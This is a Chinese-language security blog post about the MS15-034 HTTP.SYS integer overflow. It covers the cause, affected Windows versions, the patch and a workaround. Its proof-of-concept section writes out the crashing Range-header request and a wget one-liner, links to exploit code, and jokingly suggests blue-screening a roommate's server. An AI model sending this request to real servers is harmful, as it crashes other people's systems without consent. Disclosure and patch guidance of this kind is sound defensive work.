前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >MS15014之恶搞舍友的漏洞

MS15014之恶搞舍友的漏洞

作者头像
lonelyvaf
发布2018-06-07 14:47:40
5980
发布2018-06-07 14:47:40
举报

其实这是一个之前的漏洞,只是当时编译了一下POC在渗透中利用,并没有写出来=-=。

这次就把POC和测试过程发送出来。据说以前有个作死的舍友安装win2008,在同一个局域网。嗯,蓝屏的,好喝的。

00x1 漏洞原理

首先介绍下HTTP.SYS:HTTP.SYS是微软从IIS6.0开始,为了在Windows平台上优化IIS服务器性能而引入的一个内核模式驱动程序。它为IIS及其他需要运用HTTP协议的微软服务器功能提供HTTP请求的接收与响应、快速缓存、提高性能、日志等功能服务。

更多关于HTTP.SYS的信息,可以参考微软Technet Library中”IIS 6.0 Architecture”中的“HTTP Protocol Stack”一章(https://technet.microsoft.com/en-us/library/cc739400(v=ws.10).aspx)。 HTTP.SYS提供了两个最重要的功能是Kernel-mode caching 和Kernel mode request queuing,而本次的安全漏洞就出在Kernelmode caching(内核模式缓存)中。(整数型溢出)

Win7下此文件的路径:

C:\Windows\winsxs\amd64_microsoft-windows-http_31bf3856ad364e35_6.1.7600.16385_none_08b5edf0328bf3bf

这里先简单介绍一下http.sys缓存工作的原理,IIS进程w3wp.exe接收到HTTP请求后,将数据缓存到内核中,并整合HTTP回应头,最后由http.sys组织数据包经由网络内核组件发送出去。请求中包括Ranges对象的指定范围,而缓存中则包含了http文件和大小信息等。

00x2 影响范围

影响以下版本操作系统的IIS服务器

Windows 7

Windows 8

Windows server2008

Windows server2012

00x3 修复方法

目前微软官方已经给出修复补丁(3042553),用户安装修复补丁即可。https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx

https://support.microsoft.com/zh-cn/kb/3042553

如果线上的业务比较重要,就可以使用输出缓存设置,去掉两个钩,但是会造成web容器比较慢。

00x4 漏洞利用&POC

只需发送一下数据包:

GET / HTTP/1.1 Host: stuff Range: bytes=0-18446744073709551615

Content-length: 0

我们直接使用wget或curl工具,也可以直接测试这个漏洞,例如使用如下命令行:

wget 127.0.0.1 –debug –header=”Range: bytes=0-18446744073709551615″

此处18446744073709551615转为十六进制即是0xFFFFFFFFFFFFFFFF(16个F),是64位无符号整形所能表达的最大整数,那么我们很容易可以想到,这个“整数溢出”必然同这个异常的超大整数有关。

如上请求包,若IIS服务器返回“Requested RangeNot Satisfiable”,则是存在漏洞,否则如果返回”The request hasan invalid header name“,则说明漏洞已经修补。

C POC:

Domnload:https://www.exploit-db.com/exploits/36773/

https://ghostbin.com/paste/semkg

Python代码同样在网上可以搜索到

触发这个漏洞会是服务器蓝屏重启

测试效果图(手速不够,没有办法捕捉到蓝屏的一瞬间):

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2016-11-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 晨星先生 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 00x2 影响范围
  • 00x3 修复方法
  • 00x4 漏洞利用&POC
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档